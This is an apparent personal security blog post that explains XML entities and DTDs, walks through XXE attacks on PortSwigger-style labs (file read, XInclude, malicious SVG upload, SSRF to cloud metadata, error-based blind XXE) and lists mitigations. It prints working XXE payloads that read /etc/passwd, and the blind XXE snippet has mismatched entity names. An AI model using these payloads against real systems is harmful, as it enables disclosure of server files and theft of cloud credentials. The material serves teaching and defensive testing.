XXE Simplified: The concept, Attacks and Mitigations

XXE Simplified: The concept, Attacks and Mitigations

Whenever I scroll through hackerone reports, XXE remains amongst the one with a critical score on the severity perspective. Why? Being able to read server’s sensitive files is where the victim can be fully compromised. Whatever, security measures are in place fails if there’s a hole in the pot. XXE can be considered that vulnerability that could do severe harm to the organization!!

Hey Everyone! This blog post will cover the basic elements of XML and why XXE arise in the first place. In the latter part, I will cover various attack scenarios around XXE. Finally, we’ll look at the mitigations.

To exfilterate data with XXE, follow this post.

The basics of XML

Like JSON, XML is a language that can be used for storing and transportation of data. It follows tree-like structure for data representation.

XML entities

Entities are the way by which the data can be represented in XML.

Document type definition [DTD]

DTD defines the structure and legal elements and attributes of an XML document. Like I said XML can be used for transporting data, there should be a common standard accepted by everyone. Therefore, a DTD helps to check the validity of an XML document. DTDs can be both internal as well as external.

Internal DTD with elements

<?xml version="1.0"?>
<!DOCTYPE todo [
<!ELEMENT todo (name)>
<!ELEMENT name (#PCDATA)>
]>
<todo>
<name>Go to gym</name>
</todo>

The example defines a DOCTYPE named todo which contains a name of todo. So thats the format we have defined. And the xml document is expected to follow the defined structure.

Elements are actual markup tags defined by the DTD, just like HTML’s <p> or <h1>

<name></name> is a user defined element.

If you are wondering what is #PCDATA, hold on for a while. I will cover its significance later in this post.

Internal DTD with entities

<!DOCTYPE foobar [ <!ENTITY test "Test123" > ]>

This is a DTD with an entity, declared with name test and its value is “Test123”. Now this entity can be referenced in the XML document with &. Ex.

<lol>&test;</lol>

Whenever the XML document will be parsed, Test123 will be reflected.

Parameter Entities

Parameter entities behave like and are declared almost exactly like a general entity. However, they use a % instead of an &, and they can only be used in a DTD while general entities can only be used in the document content.

Syntax

<!ENTITY % name   "foobar">

Deferencing

<!ELEMENT employee (%name;)>

Parameter entities are useful when entities have to be nested in DOCTYPE element. Parameter entities are significantly used to exploit Blind XXE with out-of-band-interaction. We’ll see the usage in detail in the follow-up post.

That builds the fundamentals. Now comes the attack – XXE

So lets understand what is XXE and how it happens.

What is XXE

XXE (External XML Entity) is a vulnerability that allows the adversary to maliciously interact with the parsing of xml data. With a successful XXE attack, an attacker will be able to view server’s sensitive files like /etc/passwd.

Wondering how? Lets take an example.

<!DOCTYPE foo [ <!ENTITY malxxe SYSTEM "file:///path/to/file" > ]>

Entity malxxe is defined that uses SYSTEM identifier. A system identifier is nothing but a URI (Uniform resource identifier). file:///path/to/file is a URI. When &malxxe; is referenced in any element, the contents of file are displayed.

XXE can also be leveraged with other attacks such as SSRF to further increase the impact of compromise.

XXE attacks arise when the XML parsers are poorly configured.

There are multiple risk factors that can potentially be an entry point for XXE

  • If the application is parsing XML documents.
  • Malfored data is allowed in SYSTEM identifier within DTD
  • The XML processor is configured to validate and process the DTD.
  • The XML processor is configured to resolve external entities within DTD.

Attacks

I discussed about a basic snippet of DTD that can lead to XXE. Lets see that in action. I’ll be referencing various labs from portswigger to explain different XXE scenarios.

XXE using external entities

There is an application, that uses XML data in the request to check the price of stock.

Body of original request

<stockcheck>
<productId>1234</productId>
<storeId>1</storeId>
</stockcheck>

If the xml parsers are weakly configured, an external entity can be inserted and can be referenced in the tags that were part of the original request. Since the parser parses the document and reflects the result in the response, referencing a malformed entity can retrieve sensitive files.

Lets see how

Entity xxe has the URI file:///etc/passwd and referencing it in the <productId> reflects the contents of /etc/passwd

Checkout another example in Aragog from hackthebox where the privilege of file read can lead to initial foothold on the box.

XXE to perform SSRF

If an application is vulnerable to XXE, It can be further used for querying the internal network (not accessible from public but accessible from the application vulnerable to XXE) for sensitive information.

Ex: There is a simulated EC2 metsdata endpoint at the URL : http://169.254.169.254/

The application vulnerable to XXE can query this endpoint. The task is to read the server’s IAM secret access key.

Notice that just the URL is changed. Rest of the definition remains the same. The URL has to be contructed by viewing the response obtained after each slash(/). Refer to aws documentations to get insights around the keywords used.

Exploiting Xinclude to retrieve files

Some applications receive client-submitted data, embed it on the server-side into an XML document, and then parse the document. An example of this occurs when client-submitted data is placed into a back-end SOAP request, which is then processed by the backend SOAP service. In this scenario, you cant define a DOCTYPE element.

Here comes Xinclude to the rescue. XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. It can be placed within any data value in XML.

To perform an XInclude attack, you need to reference the XInclude namespace and provide the path to the file that you wish to include. For example:

<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>

XXE via file upload

This usecase is one of my favourites. I was just amazed with the attack possibilities with file uploads.

Here, the application uses Apache Batik library to process avatar image files. The catch here is : Even if the image uploads allow format like png or jpeg only, there might be a possiblity that library supports SVG images. And SVG used XML. So now, an attacker can submit a malicious SVG image to load sensitive content inside image.

xxe.svg file

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

XXE via modified content type

POST requests a default content type ie application/x-www-form-urlencoded. Some websites expect the request in this format but will also allow other content types including XML.

Normal Request

POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

foo=bar

With XML

POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52

<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>

If the application accepts the request with XML and parses the body as XML, then reformatiing the request can lead to XXE.

Blind XXE

Situations where you see that requests contain the data in XML format but its no where reflected in the response, It can get difficult to understand if its vulnernable to XXE or not. Also with no data reflection in response, data retrieval becomes difiicult. Therefore in such scenarios OAST techniques are used. That is yet another topic to discuss. You can find the post here.

In scope of this post, I will talk about a workaround that is possible to get data reflection even when exploiting blnd XXE.

Blind XXE to retrieve data via error messages

The trick here is to trigger an XML parsing error and load sensitive data as a part of error message. This only works if application returns error message in response.

Here we create an external DTD that when imported, will try to read the contents of /etc/passwd into file entity and try to use that in file path.

<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;

This is stored in burp’s exploit server. You can use your own server too.

Notice where the %xxe; is called. It is an incorrect format and is gonna trigger an error. And the external dtd defined contains the logic for retrieving sensitive information along with error.

Mitigations

No doubt, that XXE is a critical vulnerability to have in your application, but it can be prevented to certain extent when correct measures are taken.

  • DTD, enternal entities feature should be disabled.
  • XML processors, libraries used must be patched.
  • Validate user inputs before parsing
  • Validate, sanitise URLs to prevent SSRF
  • Use less complex data formats such as JSON

Thats all for this blog post! See you in the next one!

Until then, Happy hunting! 🙂

References

shreyapohekar

I am Shreya Pohekar. I love to build and break stuff. Currently, I'm working as iOS and angular developer. I am also a contributor to CodeVigilant project. My blogs are focused on Infosec and Dev and its how to's.

Leave a Reply